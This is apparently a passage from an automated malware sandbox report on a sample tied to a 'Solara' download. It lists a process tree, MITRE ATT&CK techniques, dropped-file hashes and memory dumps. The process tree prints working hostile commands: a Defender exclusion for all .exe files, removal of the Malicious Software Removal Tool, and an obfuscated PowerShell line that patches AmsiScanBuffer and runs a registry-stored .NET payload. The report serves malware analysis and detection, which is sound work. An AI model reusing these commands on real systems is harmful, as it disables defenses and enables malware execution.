- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2884
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3908
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:2288
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4632
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:8

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b41ad881-d23b-4bc0-be5b-64f9e257c9d1}
1⤵
PID:1632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DzrUcnRnDVsn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJiiXhLFXEcQFW,[Parameter(Position=1)][Type]$jCptORzgxy)$HAMjxZJKfpl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+'D'+[Char](101)+'l'+'e'+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+'mo'+[Char](114)+''+'y'+''+[Char](77)+''+'o'+'d'+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+'e'+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'T'+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+'n'+'s'+''+'i'+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+','+'A'+''+'u'+''+[Char](116)+''+'o'+'C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$HAMjxZJKfpl.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+'Nam'+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](80)+'u'+'b'+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJiiXhLFXEcQFW).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'na'+'g'+''+[Char](101)+''+[Char](100)+'');$HAMjxZJKfpl.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+'k'+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+'ew'+'S'+''+[Char](108)+'ot'+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l',$jCptORzgxy,$mJiiXhLFXEcQFW).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+'m'+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $HAMjxZJKfpl.CreateType();}$GhzYKhhSkvTYT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+'.d'+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+'in'+'3'+''+'2'+''+'.'+'U'+[Char](110)+'s'+[Char](97)+'f'+'e'+''+'N'+'at'+'i'+'v'+[Char](101)+''+'M'+''+[Char](101)+''+'t'+''+[Char](104)+'ods');$kZLAVkftBiddkU=$GhzYKhhSkvTYT.GetMethod('G'+[Char](101)+''+'t'+'Pr'+'o'+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+'c'+','+''+[Char](83)+''+'t'+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$onJmedJJPWUFIefIUEZ=DzrUcnRnDVsn @([String])([IntPtr]);$DQCKKjmwbRuJoXliWRvRzd=DzrUcnRnDVsn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aQUmQTtfLRD=$GhzYKhhSkvTYT.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'M'+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')));$jjuCvyYPTmFGqd=$kZLAVkftBiddkU.Invoke($Null,@([Object]$aQUmQTtfLRD,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+'b'+'r'+'aryA')));$WkWfvFMXPtdyqVSgY=$kZLAVkftBiddkU.Invoke($Null,@([Object]$aQUmQTtfLRD,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$uIbWgzv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jjuCvyYPTmFGqd,$onJmedJJPWUFIefIUEZ).Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+[Char](46)+'d'+[Char](108)+'l');$fBUmEqyziSQfRlbEh=$kZLAVkftBiddkU.Invoke($Null,@([Object]$uIbWgzv,[Object](''+[Char](65)+''+'m'+''+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$zpKanAuONK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WkWfvFMXPtdyqVSgY,$DQCKKjmwbRuJoXliWRvRzd).Invoke($fBUmEqyziSQfRlbEh,[uint32]8,4,[ref]$zpKanAuONK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fBUmEqyziSQfRlbEh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WkWfvFMXPtdyqVSgY,$DQCKKjmwbRuJoXliWRvRzd).Invoke($fBUmEqyziSQfRlbEh,[uint32]8,0x20,[ref]$zpKanAuONK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue('d'+'i'+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Command and Scripting Interpreter: PowerShell
PID:2888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU-x64.dll

Filesize
364KB

MD5
80d5f32b3fc515402b9e1fe958dedf81

SHA1
a80ffd7907e0de2ee4e13c592b888fe00551b7e0

SHA256
0ab8481b44e7d2f0d57b444689aef75b61024487a5cf188c2fc6b8de919b040a

SHA512
1589246cd480326ca22c2acb1129a3a90edf13b75031343061f0f4ed51580dfb890862162a65957be9026381bb24475fec6ddcb86692c5961a24b18461e5f1f0

Download Submit
C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe

Filesize
1.7MB

MD5
bb632bc4c4414303c783a0153f6609f7

SHA1
eb16bf0d8ce0af4d72dff415741fd0d7aac3020e

SHA256
7cc348f8d2ee10264e136425059205cf2c17493b4f3f6a43af024aecb926d8c8

SHA512
15b34efe93d53e54c1527705292fbf145d6757f10dd87bc787dc40bf02f0d641468b95c571f7037417f2f626de2afcd68b5d82214e27e9e622ab0475633e9de5

Download Submit
C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonHook.dll

Filesize
1.0MB

MD5
d62a4279ebba19c9bf0037d4f7cbf0bc

SHA1
5257d9505cca6b75fe55dfdaf2ea83a7d2d28170

SHA256
c845e808dc035329a7c95c846413a7afb9976f09872ba3c05dfa5f492156eef0

SHA512
6895a12cddc41bf516279b1235fca238b0b3b0cef2cc25abe14a9160ed23f5bde3d476f885d674537febc7de7eb58b0824d96153c626e1563a5a8a1887fb5323

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
cb557349d7af9d6754aed39b4ace5bee

SHA1
04de2ac30defbb36508a41872ddb475effe2d793

SHA256
cfc24ed7d1c2e2c6585f53db7b39aa2447bf9212487b0a3c8c2a7d8e7e5572ee

SHA512
f0cf51f42d975d720d613d09f201435bf98c6283ae5bc033207f4ada93b15e49743a235a1cfb1b761bde268e2f7f8561aa57619b99bff67a36820bc1a4d0ec4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aad1d98ca9748cc4c31aa3b5abfe0fed

SHA1
32e8d4d9447b13bc00ec3eb15a88c55c29489495

SHA256
2a07cac05ffcf140a9ad32e58ef51b32ecccf1e3ab5ef4e656770df813a8944e

SHA512
150ebf7e37d20f88b21ab7ea0793afe1d40b00611ed36f0cf1ac1371b656d26f11b08a84dbb958891c79776fae04c9c616e45e2e211d292988a5709857a3bf72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
1db7763f6e5566e898e9beaa088a5c3e

SHA1
8dac68aca67c910271e1fe0ee19693ee50502b05

SHA256
0a7a5e031aefb252b2d0e429f7d8aaf99160983d150740c92c7137ea915c5018

SHA512
51e04a7ed854eb017b524d1e9c61e919bcc1bfcb4a88596b7238e2bb4e1d8a6d1645335954b011960c0b31f6da2d4e3956c334a7a15b80a9c8609859560bd7f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
0ed5483f694ab254cd5048f48abb4f76

SHA1
a1f6a72640c2129b526af76362b4633a42074a1d

SHA256
ff5bd4fab6515fa01bfb17229ec2538357a52a1d85db574e7440a7066aee1d58

SHA512
8080d627b25a73b75118336dbc7f1e73c7c1d3574afe3f995099d7dd07876780947cd23b105ac4603a870c439da5b9fa33047226ffc7f4ed6cc7c13271bdad09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
99b8b9059db6ea6838e50401386ab98a

SHA1
da137f3a840cbf323a3f6f6978538bbe7484a823

SHA256
da7cdb5e538b88cdb1b157e45143caf4ad0286abed1852a52bad6039fa84e4b1

SHA512
7996be80f72d558bcfe77e7e2d260a955510882f9d0de80df2978b0e91d15d2cd59e6017811ca9797b4bcbf7d56a06ba775733905bbe48857046ed7b2aa44b5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
d2ef7d6f2b582975c21fd7ed2357204d

SHA1
4a43cd13fc93dedcf7214500285b4ddaca6bef8a

SHA256
948e88b6038a50534f2c14e37c598144f95a9c3f5d27179622ff7de8185d652a

SHA512
a8f4ea7641cb5164e2362aad04d7e7983492df5df421787afbfb8b46a4418a55fbc4e61dd4c8618bb3ddd82e9940a86c9ab5c6c7449b1cf5098ec9f40948ace1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
44dffa5a3cbf67426aa7382c96d43ec2

SHA1
f81c4b80908c0eab3755d11c114c5b8f61a5bd7d

SHA256
51a1bfbf95b6f6b4e13f0ae7feab2c9436e817fc2ddce1ab9f357aabe2992d30

SHA512
ef9d404a332b281fa721214b9377d2a97b9010c8d0d02354d4fe3f1d13080e708c946d246fa1427414c108f0b245041cffa1bbe2711a82c36b689650639cf9d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e7b07682f59f0b4a6542db303bb747e5

SHA1
3547118bdd1921ba99ea667272321576b9746a9e

SHA256
e0e4402a81d70e47d00c142156a9776195568cc148a9faa7a7ed5af63e242bfb

SHA512
c11f7e9c7c3ef76ea48d797dfa569a4f7cb951490e111727d911d6c7d7ba65ebf4221058cd537474c56470bd7bb37534d52e4e695974ee905456acd0a9f84912

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
5ec7d20e84ae9eeffe8428137abcb8ee

SHA1
9d5f1b38a68a8a9ac11ef9615809984beff5b5cb

SHA256
50ab185819542b5623227b2ccb555b7bad6950fe236915b1de40cc4c0133a750

SHA512
193cd471210bfdc5c4433eeda9fe1fe823ed1c55126ed19700217a7678eb27580694c2848e7098db04cd7923d014844db8cf99791e27bd40d53149c7cf42299a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
12c4ec53f308df99dee91be98398fe3a

SHA1
79188e7cd85e9be5c214ad65a1a139e89d55b949

SHA256
0ffbe13f2d35d799003d761d997ec8290f72defc5bfeaecb85e26dd45183c3ca

SHA512
3369bb50ebffc4ae0f980be3e6446400c1cef891eab1f1789b7a8f07ddf72b11f8d4e06643ad2c91753fbb93d0e3d8677b4649bfc23c20213015b9cc8f7535ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
96684c27e0e251f089fe7feb6e515d9b

SHA1
88af6d27d35203c8d83b5ced46f828f46db88f32

SHA256
50119c5751de0f43c1b6ab50ad6c9d79d8c5eef4f874575a06c2366cdfa5767b

SHA512
d528e621779e5855f4d5d3ec24b110998553f743b25b8a819935274ba8d2af807f456ee63b048a473d10df8300e6b1955365ed28068cb6a246320e5b0db2ec4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe585bb7.TMP

Filesize
539B

MD5
4aa674c0a58f2c25684e866de10ff018

SHA1
b7845ad366cebb3d0fafc9d4293255362fed55c6

SHA256
60f87ae8c3ee4228bc5943a0ea12dc8af7bc26da89229ca70ae8194bc3862236

SHA512
b62805e763e98ab63308cf929aeeeeeebde642f9bb31d8246ed99df5e6802218c03d48486f2a2797261888fac0c123fcd20137af85db59fbe1b33d1714bfbf0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
ec2812fa774112794aacc1accf35a223

SHA1
46c870ccd402bfc7923b01f7682b395aeec86c1d

SHA256
d631e49c6982fc219edd502910ab560ff98fed25c5ee1a390a3494cb9afab0ef

SHA512
0531a3ae1850861ca145df10f240827e8590d1c24669239bd5e290eaa9f42e18bc290859a1388735d6c99ae31882b285f60bbfaa424d7e6aaa86df0abdf441bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
3f58e67be7e050334c8b0c75a3d97f1b

SHA1
d8aed12d3292861bb0bae0a87a58c7a78abf1284

SHA256
9e63ee8eb1dc58547949c4034ae352ccd8f2b01659dbb3ff4001c860c8886572

SHA512
3a4b5a3720af18ade3e051c11eceb29639380172d71134674c6b1effe290419c43281429959bae827631e646eff13c457e6cf2206003ccdaccdea2dc96cabb78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
fa2ac8d2b589e9dd2d5e8ddae755f241

SHA1
9ec59eeebe638d468709e3550666952eea753039

SHA256
f84f0a1b8e10db050789f3ecb0769c6651c63bb598c6b758a55bf0a077acff67

SHA512
ffa157ace7509592ed7c59ae9dd28bcca2bb993821403bf5729845767ea3e04382904c42cc665b71e54ff489f86833d0e31249f7796501b03198f134c6108902

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
1b37d2d69ff894f2a91133e980773b5f

SHA1
21b6d07b01af3583d095a3a6ae88efb507390511

SHA256
15f085eaf1bab2e2de2775cfee7ae660874365a7fc2b2b2cfc5c411dfb4fa4de

SHA512
96fd13091e6cd8c9f52a77412aadd96f068a964e378a939be56a658f4fc0699fa6e8971b4ad2142fbc4937083527d6cac24d361611731caee6270788f4d7d322

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pk1uqhuc.20p.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FB.tmp\InstallOptions.dll

Filesize
14KB

MD5
d753362649aecd60ff434adf171a4e7f

SHA1
3b752ad064e06e21822c8958ae22e9a6bb8cf3d0

SHA256
8f24c6cf0b06d18f3c07e7bfca4e92afce71834663746cfaa9ddf52a25d5c586

SHA512
41bf41add275867553fa3bd8835cd7e2a2a362a2d5670ccbfad23700448bad9fe0f577fb6ee9d4eb81dfc10d463b325b8a873fe5912eb580936d4ad96587aa6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FB.tmp\ShellExecAsUser.dll

Filesize
7KB

MD5
86a81b9ab7de83aa01024593a03d1872

SHA1
8fd7c645e6e2cb1f1bcb97b3b5f85ce1660b66be

SHA256
27d61cacd2995f498ba971b3b2c53330bc0e9900c9d23e57b2927aadfdee8115

SHA512
cc37bd5d74d185077bdf6c4a974fb29922e3177e2c5971c664f46c057aad1236e6f3f856c5d82f1d677c29896f0e3e71283ef04f886db58abae151cb27c827ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FB.tmp\System.dll

Filesize
10KB

MD5
56a321bd011112ec5d8a32b2f6fd3231

SHA1
df20e3a35a1636de64df5290ae5e4e7572447f78

SHA256
bb6df93369b498eaa638b0bcdc4bb89f45e9b02ca12d28bcedf4629ea7f5e0f1

SHA512
5354890cbc53ce51081a78c64ba9c4c8c4dc9e01141798c1e916e19c5776dac7c82989fad0f08c73e81aaba332dad81205f90d0663119af45550b97b338b9cc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FB.tmp\ioSpecial.ini

Filesize
709B

MD5
13e8ff6f7d7d169e3f52ea84a1d8cb98

SHA1
55a3fd578b0f5fed3255fcf16e63175015aac5b6

SHA256
d1678dea6bd6e2646954718b1977fa5bb5a5ffa9b9ea32a53fc87e66f0bab234

SHA512
f980d07524a3ca3f2bdc51268f93192736195de93934087427ef2a93d54e4374978e6ebd7d311cd82a11da423114e07537987a65bef57be522e666731af3fb9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FB.tmp\ioSpecial.ini

Filesize
765B

MD5
0eb5708394f05e71dab366ff62b6e389

SHA1
1c52c144264f928bc5a60c83883811eca6ae8279

SHA256
b27ca433b18ff01bd5b6cf03f29cdc5f1a474df153beabe621f133084c999a1b

SHA512
52d0905ca3422fcfab5c978259fb4f1c684e6b02e794edb2ea957570d36b34904d267e1b2e8591a69cc8c269707a6f35bd61ae6b7f61a22a275f1cafc49ed199

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FB.tmp\nsDialogs.dll

Filesize
9KB

MD5
f832e4279c8ff9029b94027803e10e1b

SHA1
134ff09f9c70999da35e73f57b70522dc817e681

SHA256
4cd17f660560934a001fc8e6fdcea50383b78ca129fb236623a9666fcbd13061

SHA512
bf92b61aa267e3935f0ea7f47d8d96f09f016e648c2a7e7dcd5ecc47da864e824c592098c1e39526b643bd126c5c99d68a7040411a4cf68857df629f24d4107d

Download Submit
C:\Users\Admin\Downloads\Solara.zip

Filesize
904KB

MD5
9e4518f9519ec1547319058cce52f062

SHA1
d09a6b192d71773ad39593a39eb086472f081d3a

SHA256
0f3d2582ebde9b2e89ff6d8b8380d64e7274bd7da9142d75d9030059b5850310

SHA512
09f985a9d437dc90277f5c6cd86df124833960751cd38e630de1b05232de4be299295d4879b3f896dd5488f2f09492cef009ecc92e46ee36434971bff8d4a27c

Download Submit
C:\Users\Admin\Downloads\SolaraBootstrapper.exe:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 220267.crdownload

Filesize
5.4MB

MD5
d888c3ce26f495ff9057e3561c0929cc

SHA1
60d53007879cdec148248131a1417f8a4b9b853b

SHA256
f0e7dc30de53be0568cfbc586754f67db9c65b72dcac5fa0360b62f628cbe36b

SHA512
5a24d4929c750f10c33cead2bb4f530c4d032800bf99722e6a1d32b73cc6e08189eac3336a651c1d59ce745afeb34b7f43a7d6125a227d125f1faa6083643f5e

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
4KB

MD5
dbbd2d4458d7e8094846420da595dfc3

SHA1
267cb47b904f14a519d2bd73abfdb30e1a06e1a6

SHA256
e27390d57580e3dfba07bec3d8e430203bbc91e90f6937079b3fd52abc721bd4

SHA512
480e7ca865b811f79f35fcfe7a9ac0280b48d1f9459873d18f000db55c72d53345cf3a10075c1ac407439545f699ce2a7bef38b00b4e19439edf384b00045531

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bb7d9cd87343b2c81c21c7b27e6ab694

SHA1
27475110d09f1fc948f1d5ecf3e41aba752401fd

SHA256
b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df

SHA512
bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b

Download Submit
memory/480-1031-0x000001F8EF420000-0x000001F8EF43C000-memory.dmp

Filesize
112KB

Download
memory/480-1032-0x000001F8EF440000-0x000001F8EF4F3000-memory.dmp

Filesize
716KB

Download
memory/480-1033-0x000001F8EF410000-0x000001F8EF41A000-memory.dmp

Filesize
40KB

Download
memory/480-1034-0x000001F8EF620000-0x000001F8EF63C000-memory.dmp

Filesize
112KB

Download
memory/480-1035-0x000001F8EF600000-0x000001F8EF60A000-memory.dmp

Filesize
40KB

Download
memory/480-1036-0x000001F8EF660000-0x000001F8EF67A000-memory.dmp

Filesize
104KB

Download
memory/480-1038-0x000001F8EF640000-0x000001F8EF646000-memory.dmp

Filesize
24KB

Download
memory/480-1037-0x000001F8EF610000-0x000001F8EF618000-memory.dmp

Filesize
32KB

Download
memory/480-1039-0x000001F8EF650000-0x000001F8EF65A000-memory.dmp

Filesize
40KB

Download
memory/1660-577-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-555-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-586-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-585-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-584-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-583-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-582-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-581-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-580-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-579-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-578-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-589-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-576-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-575-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-574-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-573-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-572-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-571-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-570-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-569-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-568-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-567-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-566-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-565-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-564-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-563-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-562-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-561-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-560-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-559-0x000000007FD20000-0x000000007FD30000-memory.dmp

Filesize
64KB

Download
memory/1660-558-0x000000007FD20000-0x000000007FD30000-memory.dmp

